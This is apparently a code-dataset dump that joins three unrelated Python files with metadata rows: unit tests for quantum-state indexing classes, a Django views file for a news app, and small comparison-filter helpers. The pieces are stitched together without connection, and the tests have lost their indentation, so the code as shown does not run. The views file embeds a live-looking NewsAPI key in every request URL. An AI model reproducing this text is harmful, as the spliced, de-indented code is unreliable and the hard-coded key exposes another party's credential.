assert si.get_lst(charge=2, sz=0, ssq=0) == [6, 7, 8]
def test_StateIndexingPauli_charge():
si = StateIndexingPauli(4, indexing='charge')
assert si.npauli_ == 16
assert si.npauli == 16
assert list(si.shiftlst0) == [0, 1, 5, 11, 15, 16]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15], []]
assert list(si.mapdm0) == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
assert list(si.booldm0) == [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
assert si.get_ind_dm0(8, 8, 2, maptype=0) == 8
assert si.get_ind_dm0(8, 8, 2, maptype=1) == 8
assert si.get_ind_dm0(8, 8, 2, maptype=2) == 1
#
si.set_statesdm([[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], []])
assert si.npauli_ == 11
assert si.npauli == 11
assert list(si.shiftlst0) == [0, 1, 1, 7, 11, 11]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [], []]
assert list(si.mapdm0) == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
assert list(si.booldm0) == [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
assert si.get_ind_dm0(8, 8, 2, maptype=0) == 4
assert si.get_ind_dm0(8, 8, 2, maptype=1) == 4
assert si.get_ind_dm0(8, 8, 2, maptype=2) == 1
def test_StateIndexingPauli_ssq():
si = StateIndexingPauli(4, indexing='ssq')
assert si.npauli_ == 16
assert si.npauli == 10
assert list(si.shiftlst0) == [0, 1, 5, 11, 15, 16]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15], []]
assert list(si.mapdm0) == [0, 1, 2, 1, 2, 3, 4, 5, 6, 3, 3, 7, 8, 7, 8, 9]
assert list(si.booldm0) == [1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 1]
assert si.get_ind_dm0(8, 8, 2, maptype=0) == 8
assert si.get_ind_dm0(8, 8, 2, maptype=1) == 6
assert si.get_ind_dm0(8, 8, 2, maptype=2) == 1
#
si.set_statesdm([[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], []])
assert si.npauli_ == 11
assert si.npauli == 7
assert list(si.shiftlst0) == [0, 1, 1, 7, 11, 11]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [], []]
assert list(si.mapdm0) == [0, 1, 2, 3, 4, 1, 1, 5, 6, 5, 6]
assert list(si.booldm0) == [1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0]
assert si.get_ind_dm0(8, 8, 2, maptype=0) == 4
assert si.get_ind_dm0(8, 8, 2, maptype=1) == 4
assert si.get_ind_dm0(8, 8, 2, maptype=2) == 1
def test_StateIndexingDM_charge():
si = StateIndexingDM(4, indexing='charge')
assert si.ndm0_tot == 70
assert si.ndm0_ == 70
assert si.ndm0 == 43
assert si.ndm0r == 70
assert si.npauli_ == 16
assert si.npauli == 16
assert si.ndm1_tot == 56
assert si.ndm1_ == 56
assert si.ndm1 == 56
assert list(si.shiftlst0) == [0, 1, 17, 53, 69, 70]
assert list(si.shiftlst1) == [0, 4, 28, 52, 56]
assert list(si.lenlst) == [1, 4, 6, 4, 1]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15], []]
assert list(si.mapdm0) == [0, 1, 16, 17, 18, 16, 2, 19, 20, 17, 19, 3, 21, 18, 20, 21, 4, 5, 22, 23, 24, 25, 26, 22, 6, 27, 28, 29, 30, 23, 27, 7, 31, 32, 33, 24, 28, 31, 8, 34, 35, 25, 29, 32, 34, 9, 36, 26, 30, 33, 35, 36, 10, 11, 37, 38, 39, 37, 12, 40, 41, 38, 40, 13, 42, 39, 41, 42, 14, 15]
assert si.inddm0 == {0: (0, 0), 1: (1, 1), 2: (2, 2), 3: (3, 3), 4: (4, 4), 5: (5, 5), 6: (6, 6), 7: (7, 7), 8: (8, 8), 9: (9, 9), 10: (10, 10), 11: (11, 11), 12: (12, 12), 13: (13, 13), 14: (14, 14), 15: (15, 15), 16: (1, 2), 17: (1, 3), 18: (1, 4), 19: (2, 3), 20: (2, 4), 21: (3, 4), 22: (5, 6), 23: (5, 7), 24: (5, 8), 25: (5, 9), 26: (5, 10), 27: (6, 7), 28: (6, 8), 29: (6, 9), 30: (6, 10), 31: (7, 8), 32: (7, 9), 33: (7, 10), 34: (8, 9), 35: (8, 10), 36: (9, 10), 37: (11, 12), 38: (11, 13), 39: (11, 14), 40: (12, 13), 41: (12, 14), 42: (13, 14)}
assert list(si.booldm0) == [1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1]
assert list(si.conjdm0) == [1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1]
assert si.get_ind_dm0(7, 8, 2, maptype=0) == 32
assert si.get_ind_dm0(7, 8, 2, maptype=1) == 31
assert si.get_ind_dm0(7, 8, 2, maptype=2) == 1
assert si.get_ind_dm0(7, 8, 2, maptype=3) == 1
assert si.get_ind_dm0(8, 7, 2, maptype=2) == 0
assert si.get_ind_dm0(8, 7, 2, maptype=3) == 0
assert si.get_ind_dm0(5, 8, 2, maptype=1) == 24
assert si.get_ind_dm1(5, 4, 1) == 7
#
si.set_statesdm([[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], []])
assert si.ndm0_ == 53
assert si.ndm0 == 32
assert si.ndm0r == 53
assert si.npauli_ == 11
assert si.npauli == 11
assert si.ndm1_ == 24
assert si.ndm1 == 24
assert list(si.shiftlst0) == [0, 1, 1, 37, 53, 53]
assert list(si.shiftlst1) == [0, 0, 0, 24, 24]
assert list(si.lenlst) == [1, 0, 6, 4, 0]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [], []]
assert list(si.mapdm0) == [0, 1, 11, 12, 13, 14, 15, 11, 2, 16, 17, 18, 19, 12, 16, 3, 20, 21, 22, 13, 17, 20, 4, 23, 24, 14, 18, 21, 23, 5, 25, 15, 19, 22, 24, 25, 6, 7, 26, 27, 28, 26, 8, 29, 30, 27, 29, 9, 31, 28, 30, 31, 10]
assert si.inddm0 == {0: (0, 0), 1: (5, 5), 2: (6, 6), 3: (7, 7), 4: (8, 8), 5: (9, 9), 6: (10, 10), 7: (11, 11), 8: (12, 12), 9: (13, 13), 10: (14, 14), 11: (5, 6), 12: (5, 7), 13: (5, 8), 14: (5, 9), 15: (5, 10), 16: (6, 7), 17: (6, 8), 18: (6, 9), 19: (6, 10), 20: (7, 8), 21: (7, 9), 22: (7, 10), 23: (8, 9), 24: (8, 10), 25: (9, 10), 26: (11, 12), 27: (11, 13), 28: (11, 14), 29: (12, 13), 30: (12, 14), 31: (13, 14)}
assert list(si.booldm0) == [1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1]
assert list(si.conjdm0) == [1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1]
assert si.get_ind_dm0(7, 8, 2, maptype=0) == 16
assert si.get_ind_dm0(7, 8, 2, maptype=1) == 20
assert si.get_ind_dm0(7, 8, 2, maptype=2) == 1
assert si.get_ind_dm0(7, 8, 2, maptype=3) == 1
assert si.get_ind_dm0(8, 7, 2, maptype=2) == 0
assert si.get_ind_dm0(8, 7, 2, maptype=3) == 0
assert si.get_ind_dm0(5, 8, 2, maptype=1) == 13
assert si.get_ind_dm1(5, 4, 1) == 3
def test_StateIndexingDM_ssq():
si = StateIndexingDM(4, indexing='ssq')
assert si.ndm0_tot == 70
assert si.ndm0_ == 70
assert si.ndm0 == 15
assert si.ndm0r == 20
assert si.npauli_ == 16
assert si.npauli == 10
assert si.ndm1_tot == 56
assert si.ndm1_ == 56
assert si.ndm1 == 56
assert list(si.shiftlst0) == [0, 1, 17, 53, 69, 70]
assert list(si.shiftlst1) == [0, 4, 28, 52, 56]
assert list(si.lenlst) == [1, 4, 6, 4, 1]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15], []]
assert list(si.mapdm0) == [0, 1, 10, -1, -1, 10, 2, -1, -1, -1, -1, 1, 10, -1, -1, 10, 2, 3, -1, -1, -1, -1, -1, -1, 4, 11, 12, -1, -1, -1, 11, 5, 13, -1, -1, -1, 12, 13, 6, -1, -1, -1, -1, -1, -1, 3, -1, -1, -1, -1, -1, -1, 3, 7, 14, -1, -1, 14, 8, -1, -1, -1, -1, 7, 14, -1, -1, 14, 8, 9]
assert si.inddm0 == {0: (0, 0), 1: (1, 1), 2: (2, 2), 3: (5, 5), 4: (6, 6), 5: (7, 7), 6: (8, 8), 7: (11, 11), 8: (12, 12), 9: (15, 15), 10: (1, 2), 11: (6, 7), 12: (6, 8), 13: (7, 8), 14: (11, 12)}
assert list(si.booldm0) == [1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
assert list(si.conjdm0) == [1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1]
assert si.get_ind_dm0(7, 8, 2, maptype=0) == 32
assert si.get_ind_dm0(7, 8, 2, maptype=1) == 13
assert si.get_ind_dm0(7, 8, 2, maptype=2) == 1
assert si.get_ind_dm0(7, 8, 2, maptype=3) == 1
assert si.get_ind_dm0(8, 7, 2, maptype=2) == 0
assert si.get_ind_dm0(8, 7, 2, maptype=3) == 0
assert si.get_ind_dm0(5, 8, 2, maptype=1) == -1
assert si.get_ind_dm1(5, 4, 1) == 7
#
si.set_statesdm([[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], []])
assert si.ndm0_ == 53
assert si.ndm0 == 11
assert si.ndm0r == 15
assert si.npauli_ == 11
assert si.npauli == 7
assert si.ndm1_ == 24
assert si.ndm1 == 24
assert list(si.shiftlst0) == [0, 1, 1, 37, 53, 53]
assert list(si.shiftlst1) == [0, 0, 0, 24, 24]
assert list(si.lenlst) == [1, 0, 6, 4, 0]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [], []]
assert list(si.mapdm0) == [0, 1, -1, -1, -1, -1, -1, -1, 2, 7, 8, -1, -1, -1, 7, 3, 9, -1, -1, -1, 8, 9, 4, -1, -1, -1, -1, -1, -1, 1, -1, -1, -1, -1, -1, -1, 1, 5, 10, -1, -1, 10, 6, -1, -1, -1, -1, 5, 10, -1, -1, 10, 6]
assert si.inddm0 == {0: (0, 0), 1: (5, 5), 2: (6, 6), 3: (7, 7), 4: (8, 8), 5: (11, 11), 6: (12, 12), 7: (6, 7), 8: (6, 8), 9: (7, 8), 10: (11, 12)}
assert list(si.booldm0) == [1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
assert list(si.conjdm0) == [1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1]
assert si.get_ind_dm0(7, 8, 2, maptype=0) == 16
assert si.get_ind_dm0(7, 8, 2, maptype=1) == 9
assert si.get_ind_dm0(7, 8, 2, maptype=2) == 1
assert si.get_ind_dm0(7, 8, 2, maptype=3) == 1
assert si.get_ind_dm0(8, 7, 2, maptype=2) == 0
assert si.get_ind_dm0(8, 7, 2, maptype=3) == 0
assert si.get_ind_dm0(5, 8, 2, maptype=1) == -1
assert si.get_ind_dm1(5, 4, 1) == 3
def test_StateIndexingDMc_charge():
si = StateIndexingDMc(4, indexing='charge')
assert si.ndm0_tot == 70
assert si.ndm0_ == 70
assert si.ndm0 == 70
assert si.ndm0r == 124
assert si.npauli_ == 16
assert si.npauli == 16
assert si.ndm1_tot == 56
assert si.ndm1_ == 56
assert si.ndm1 == 56
assert list(si.shiftlst0) == [0, 1, 17, 53, 69, 70]
assert list(si.shiftlst1) == [0, 4, 28, 52, 56]
assert list(si.lenlst) == [1, 4, 6, 4, 1]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15], []]
assert list(si.mapdm0) == [0, 1, 16, 17, 18, 19, 2, 20, 21, 22, 23, 3, 24, 25, 26, 27, 4, 5, 28, 29, 30, 31, 32, 33, 6, 34, 35, 36, 37, 38, 39, 7, 40, 41, 42, 43, 44, 45, 8, 46, 47, 48, 49, 50, 51, 9, 52, 53, 54, 55, 56, 57, 10, 11, 58, 59, 60, 61, 12, 62, 63, 64, 65, 13, 66, 67, 68, 69, 14, 15]
assert si.inddm0 == {0: (0, 0), 1: (1, 1), 2: (2, 2), 3: (3, 3), 4: (4, 4), 5: (5, 5), 6: (6, 6), 7: (7, 7), 8: (8, 8), 9: (9, 9), 10: (10, 10), 11: (11, 11), 12: (12, 12), 13: (13, 13), 14: (14, 14), 15: (15, 15), 16: (1, 2), 17: (1, 3), 18: (1, 4), 19: (2, 1), 20: (2, 3), 21: (2, 4), 22: (3, 1), 23: (3, 2), 24: (3, 4), 25: (4, 1), 26: (4, 2), 27: (4, 3), 28: (5, 6), 29: (5, 7), 30: (5, 8), 31: (5, 9), 32: (5, 10), 33: (6, 5), 34: (6, 7), 35: (6, 8), 36: (6, 9), 37: (6, 10), 38: (7, 5), 39: (7, 6), 40: (7, 8), 41: (7, 9), 42: (7, 10), 43: (8, 5), 44: (8, 6), 45: (8, 7), 46: (8, 9), 47: (8, 10), 48: (9, 5), 49: (9, 6), 50: (9, 7), 51: (9, 8), 52: (9, 10), 53: (10, 5), 54: (10, 6), 55: (10, 7), 56: (10, 8), 57: (10, 9), 58: (11, 12), 59: (11, 13), 60: (11, 14), 61: (12, 11), 62: (12, 13), 63: (12, 14), 64: (13, 11), 65: (13, 12), 66: (13, 14), 67: (14, 11), 68: (14, 12), 69: (14, 13)}
assert list(si.booldm0) == [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
assert si.get_ind_dm0(7, 8, 2, maptype=0) == 32
assert si.get_ind_dm0(7, 8, 2, maptype=1) == 40
assert si.get_ind_dm0(7, 8, 2, maptype=2) == True
assert si.get_ind_dm0(8, 7, 2, maptype=2) == True
assert si.get_ind_dm0(5, 8, 2, maptype=1) == 30
assert si.get_ind_dm1(5, 4, 1) == 7
#
si.set_statesdm([[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], []])
assert si.ndm0_ == 53
assert si.ndm0 == 53
assert si.ndm0r == 95
assert si.npauli_ == 11
assert si.npauli == 11
assert si.ndm1_ == 24
assert si.ndm1 == 24
assert list(si.shiftlst0) == [0, 1, 1, 37, 53, 53]
assert list(si.shiftlst1) == [0, 0, 0, 24, 24]
assert list(si.lenlst) == [1, 0, 6, 4, 0]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [], []]
assert list(si.mapdm0) == [0, 1, 11, 12, 13, 14, 15, 16, 2, 17, 18, 19, 20, 21, 22, 3, 23, 24, 25, 26, 27, 28, 4, 29, 30, 31, 32, 33, 34, 5, 35, 36, 37, 38, 39, 40, 6, 7, 41, 42, 43, 44, 8, 45, 46, 47, 48, 9, 49, 50, 51, 52, 10]
assert si.inddm0 == {0: (0, 0), 1: (5, 5), 2: (6, 6), 3: (7, 7), 4: (8, 8), 5: (9, 9), 6: (10, 10), 7: (11, 11), 8: (12, 12), 9: (13, 13), 10: (14, 14), 11: (5, 6), 12: (5, 7), 13: (5, 8), 14: (5, 9), 15: (5, 10), 16: (6, 5), 17: (6, 7), 18: (6, 8), 19: (6, 9), 20: (6, 10), 21: (7, 5), 22: (7, 6), 23: (7, 8), 24: (7, 9), 25: (7, 10), 26: (8, 5), 27: (8, 6), 28: (8, 7), 29: (8, 9), 30: (8, 10), 31: (9, 5), 32: (9, 6), 33: (9, 7), 34: (9, 8), 35: (9, 10), 36: (10, 5), 37: (10, 6), 38: (10, 7), 39: (10, 8), 40: (10, 9), 41: (11, 12), 42: (11, 13), 43: (11, 14), 44: (12, 11), 45: (12, 13), 46: (12, 14), 47: (13, 11), 48: (13, 12), 49: (13, 14), 50: (14, 11), 51: (14, 12), 52: (14, 13)}
assert list(si.booldm0) == [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
assert si.get_ind_dm0(7, 8, 2, maptype=0) == 16
assert si.get_ind_dm0(7, 8, 2, maptype=1) == 23
assert si.get_ind_dm0(7, 8, 2, maptype=2) == 1
assert si.get_ind_dm0(8, 7, 2, maptype=2) == 1
assert si.get_ind_dm0(5, 8, 2, maptype=1) == 13
assert si.get_ind_dm1(5, 4, 1) == 3
def test_StateIndexingDMc_ssq():
si = StateIndexingDMc(4, indexing='ssq')
assert si.ndm0_tot == 70
assert si.ndm0_ == 70
assert si.ndm0 == 20
assert si.ndm0r == 30
assert si.npauli_ == 16
assert si.npauli == 10
assert si.ndm1_tot == 56
assert si.ndm1_ == 56
assert si.ndm1 == 56
assert list(si.shiftlst0) == [0, 1, 17, 53, 69, 70]
assert list(si.shiftlst1) == [0, 4, 28, 52, 56]
assert list(si.lenlst) == [1, 4, 6, 4, 1]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15], []]
assert list(si.mapdm0) == [0, 1, 10, -1, -1, 11, 2, -1, -1, -1, -1, 1, 10, -1, -1, 11, 2, 3, -1, -1, -1, -1, -1, -1, 4, 12, 13, -1, -1, -1, 14, 5, 15, -1, -1, -1, 16, 17, 6, -1, -1, -1, -1, -1, -1, 3, -1, -1, -1, -1, -1, -1, 3, 7, 18, -1, -1, 19, 8, -1, -1, -1, -1, 7, 18, -1, -1, 19, 8, 9]
assert si.inddm0 == {0: (0, 0), 1: (1, 1), 2: (2, 2), 3: (5, 5), 4: (6, 6), 5: (7, 7), 6: (8, 8), 7: (11, 11), 8: (12, 12), 9: (15, 15), 10: (1, 2), 11: (2, 1), 12: (6, 7), 13: (6, 8), 14: (7, 6), 15: (7, 8), 16: (8, 6), 17: (8, 7), 18: (11, 12), 19: (12, 11)}
assert list(si.booldm0) == [1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
assert si.get_ind_dm0(7, 8, 2, maptype=0) == 32
assert si.get_ind_dm0(7, 8, 2, maptype=1) == 15
assert si.get_ind_dm0(7, 8, 2, maptype=2) == 1
assert si.get_ind_dm0(8, 7, 2, maptype=2) == 1
assert si.get_ind_dm0(5, 8, 2, maptype=1) == -1
assert si.get_ind_dm1(5, 4, 1) == 7
#
si.set_statesdm([[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], []])
assert si.ndm0_ == 53
assert si.ndm0 == 15
assert si.ndm0r == 23
assert si.npauli_ == 11
assert si.npauli == 7
assert si.ndm1_ == 24
assert si.ndm1 == 24
assert list(si.shiftlst0) == [0, 1, 1, 37, 53, 53]
assert list(si.shiftlst1) == [0, 0, 0, 24, 24]
assert list(si.lenlst) == [1, 0, 6, 4, 0]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [], []]
assert list(si.mapdm0) == [0, 1, -1, -1, -1, -1, -1, -1, 2, 7, 8, -1, -1, -1, 9, 3, 10, -1, -1, -1, 11, 12, 4, -1, -1, -1, -1, -1, -1, 1, -1, -1, -1, -1, -1, -1, 1, 5, 13, -1, -1, 14, 6, -1, -1, -1, -1, 5, 13, -1, -1, 14, 6]
assert si.inddm0 == {0: (0, 0), 1: (5, 5), 2: (6, 6), 3: (7, 7), 4: (8, 8), 5: (11, 11), 6: (12, 12), 7: (6, 7), 8: (6, 8), 9: (7, 6), 10: (7, 8), 11: (8, 6), 12: (8, 7), 13: (11, 12), 14: (12, 11)}
assert list(si.booldm0) == [1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
assert si.get_ind_dm0(7, 8, 2, maptype=0) == 16
assert si.get_ind_dm0(7, 8, 2, maptype=1) == 10
assert si.get_ind_dm0(7, 8, 2, maptype=2) == 1
assert si.get_ind_dm0(8, 7, 2, maptype=2) == 1
assert si.get_ind_dm0(5, 8, 2, maptype=1) == -1
assert si.get_ind_dm1(5, 4, 1) == 3
| 58.493644 | 900 | 0.44011 | 5,560 | 27,609 | 2.130216 | 0.027338 | 0.086457 | 0.08612 | 0.082067 | 0.78183 | 0.749325 | 0.72923 | 0.704745 | 0.687099 | 0.673674 | 0 | 0.275803 | 0.299902 | 27,609 | 471 | 901 | 58.617834 | 0.336955 | 0 | 0 | 0.485437 | 0 | 0 | 0.003008 | 0 | 0 | 0 | 0 | 0 | 0.711165 | 1 | 0.055825 | false | 0 | 0.002427 | 0 | 0.058252 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b7c6da9e985b1af126f132f1fe97774370c9a2fe | 1,129 | py | Python | Scripts/Miscellaneous/newsapp/news/views.py | valterm/Python_and_the_Web | a51b97870576dde8e8b7e78144e3b7ef8edebeac | [
"MIT"
] | 3 | 2020-10-13T17:41:33.000Z | 2021-06-02T15:01:58.000Z | Scripts/Miscellaneous/newsapp/news/views.py | valterm/Python_and_the_Web | a51b97870576dde8e8b7e78144e3b7ef8edebeac | [
"MIT"
] | null | null | null | Scripts/Miscellaneous/newsapp/news/views.py | valterm/Python_and_the_Web | a51b97870576dde8e8b7e78144e3b7ef8edebeac | [
"MIT"
] | null | null | null | from django.shortcuts import render
import requests
import json
# Create your views here.
def home(request):
news_api_requests= requests.get("http://newsapi.org/v2/top-headlines?country=in&apiKey=82b29d682aea4a05b79b1f53dc4c2f95")
api = json.loads(news_api_requests.content)
return render(request, 'home.html',{'api':api})
def bussiness(request):
news_api_requests= requests.get("http://newsapi.org/v2/top-headlines?country=in&category=business&apiKey=82b29d682aea4a05b79b1f53dc4c2f95")
api = json.loads(news_api_requests.content)
return render(request, 'bussiness.html',{'api':api})
def entertainment(request):
news_api_requests= requests.get("http://newsapi.org/v2/top-headlines?country=in&category=entertainment&apiKey=82b29d682aea4a05b79b1f53dc4c2f95")
api = json.loads(news_api_requests.content)
return render(request, 'entertainment.html',{'api':api})
def sports(request):
news_api_requests= requests.get("http://newsapi.org/v2/top-headlines?country=in&category=sports&apiKey=82b29d682aea4a05b79b1f53dc4c2f95")
api = json.loads(news_api_requests.content)
return render(request, 'sports.html',{'api':api})
| 41.814815 | 145 | 0.798051 | 147 | 1,129 | 6.020408 | 0.244898 | 0.063277 | 0.135593 | 0.099435 | 0.754802 | 0.754802 | 0.754802 | 0.754802 | 0.754802 | 0.754802 | 0 | 0.075614 | 0.062888 | 1,129 | 26 | 146 | 43.423077 | 0.76087 | 0.020372 | 0 | 0.210526 | 0 | 0.157895 | 0.421578 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.210526 | false | 0 | 0.157895 | 0 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
b7d2215951ea51bb127a710281d5d0d503cf668c | 1,365 | py | Python | query_collections/filters.py | c4wrd/query_collections | 18f0368ecf3f487bbdad518bc687a47b94279b1c | [
"MIT"
] | null | null | null | query_collections/filters.py | c4wrd/query_collections | 18f0368ecf3f487bbdad518bc687a47b94279b1c | [
"MIT"
] | 4 | 2016-03-17T21:56:04.000Z | 2016-03-17T22:27:53.000Z | query_collections/filters.py | c4wrd/query_collections | 18f0368ecf3f487bbdad518bc687a47b94279b1c | [
"MIT"
] | null | null | null | def eq(compare_item):
"""
Ensures the filtered item equals the compare_item
result == compare_item
:return: Callback to be used by the query search.
"""
def callback(item):
return item == compare_item
return callback
def less(compare_item):
"""
Ensures the filtered item is less than the compare_item
result < compare_item
:return: Callback to be used by the query search.
"""
def callback(item):
return item < compare_item
return callback
def greater(compare_item):
"""
Ensures the filtered item is greater than the compare_item
result > compare_item
:return: Callback to be used by the query search.
"""
def callback(item):
return item > compare_item
return callback
def lessEqual(compare_item):
"""
Ensures the filtered item is greater than or equal to the compare_item
result <= compare_item
:return: Callback to be used by the query search.
"""
def callback(item):
return item <= compare_item
return callback
def greaterEqual(compare_item):
"""
Ensures the filtered item is greater than or equal to the compare_item
result >= compare_item
:return: Callback to be used by the query search.
"""
def callback(item):
return item >= compare_item
return callback
